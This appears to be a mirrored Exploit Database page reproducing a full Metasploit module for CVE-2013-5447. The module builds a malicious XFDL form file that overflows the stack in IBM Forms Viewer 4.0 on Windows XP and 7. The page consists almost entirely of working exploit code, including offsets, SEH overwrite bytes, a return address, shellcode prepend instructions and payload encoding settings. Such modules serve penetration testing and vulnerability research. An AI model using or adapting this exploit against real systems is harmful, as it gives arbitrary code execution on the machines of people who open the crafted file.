IBM Forms Viewer – Unicode Buffer Overflow (Metasploit)

• Exploit Database
• 119 阅读

• 作者： Metasploit
  日期： 2014-01-07
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/30789/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157

  ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &apos;msf/core&apos; require &apos;rexml/document&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include REXML include Msf::Exploit::FILEFORMAT   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;IBM Forms Viewer Unicode Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long fontname value. This module has been tested successfully on IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;rgod <rgod[at]autistici.org>&apos;, # Vulnerability discovery &apos;juan vazquez&apos;, # Metasploit module ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2013-5447&apos; ], [ &apos;OSVDB&apos;, &apos;100732&apos; ], [ &apos;ZDI&apos;, &apos;13-274&apos; ], [ &apos;URL&apos;, &apos;http://www-01.ibm.com/support/docview.wss?uid=swg21657500&apos; ], ], &apos;Payload&apos;=> { &apos;Space&apos;=> 3000, &apos;EncoderType&apos;=> Msf::Encoder::Type::AlphanumUnicodeMixed, &apos;EncoderOptions&apos; => { &apos;BufferRegister&apos; => &apos;ECX&apos;, &apos;BufferOffset&apos; => 10 }, &apos;BadChars&apos; => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"), &apos;DisableNops&apos;=> true, # Fix the stack before the payload is executed, so we avoid # windows exceptions due to alignment &apos;Prepend&apos;=> "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1&apos;, # masqform.exe 8.0.0.266 { &apos;Ret&apos;=> 0x4c30, # p/p/r unicode from masqform.exe &apos;Nop&apos;=> 0x47, # 004700 => add [edi+0x0],al &apos;Offset&apos; => 62 } ] ], &apos;Privileged&apos; => false, &apos;DisclosureDate&apos; => &apos;Dec 05 2013&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ true, &apos;The file name.&apos;,&apos;msf.xfdl&apos;]), ], self.class) end   def generate_xfdl xml = Document.new   # XFDL xfdl = xml.add_element("XFDL", { &apos;xmlns:custom&apos; => "http://www.ibm.com/xmlns/prod/XFDL/Custom", &apos;xmlns:designer&apos; => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6", &apos;xmlns:ev&apos; => "http://www.w3.org/2001/xml-events", &apos;xmlns:xfdl&apos; => "http://www.ibm.com/xmlns/prod/XFDL/7.5", &apos;xmlns:xforms&apos; => "http://www.w3.org/2002/xforms", &apos;xmlns&apos;=> "http://www.ibm.com/xmlns/prod/XFDL/7.5", &apos;xmlns:xsd&apos;=> "http://www.w3.org/2001/XMLSchema", &apos;xmlns:xsi&apos;=> "http://www.w3.org/2001/XMLSchema-instance" })   # XFDL => globalpage xdfl_global_page = xfdl.add_element("globalpage", { "sid" => "global" }) global = xdfl_global_page.add_element("global", { "sid" => "global" }) designer_date = global.add_element("designer:date") designer_date.text = "20060615" form_id = global.add_element("formid") form_id.add_element("title") serial_number = form_id.add_element("serialnumber") serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000" version_form = form_id.add_element("version") version_form.text = "1"   # XFDL => page page = xfdl.add_element("page", { "sid" => "PAGE1" })   # XFDL => page => global page_global = page.add_element("global", { "sid" => "global" }) label_page = page_global.add_element("label") label_page.text = "PAGE1"   # XFDL => page => label label = page.add_element("label", { "sid" => "title" }) item_location = label.add_element("itemlocation") x = item_location.add_element("x") x.text = "20" y = item_location.add_element("y") y.text = "0" value = label.add_element("value", { "compute" => "global.global.custom:formTitle" }) value.text = rand_text_alpha(10) font_info = label.add_element("fontinfo") font_name = font_info.add_element("fontname") font_name.text = "MSF_REPLACE" xml.to_s end     def exploit sploit = rand_text_alpha(target[&apos;Offset&apos;]) sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200) sploit << [target.ret].pack("v") # seh # ppr sploit << [target[&apos;Nop&apos;]].pack("C") sploit << payload.encoded sploit << rand_text_alpha(4096)# make it crash   xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding   print_status("Creating &apos;#{datastore[&apos;FILENAME&apos;]}&apos; file ...")   file_create(xfdl) end   end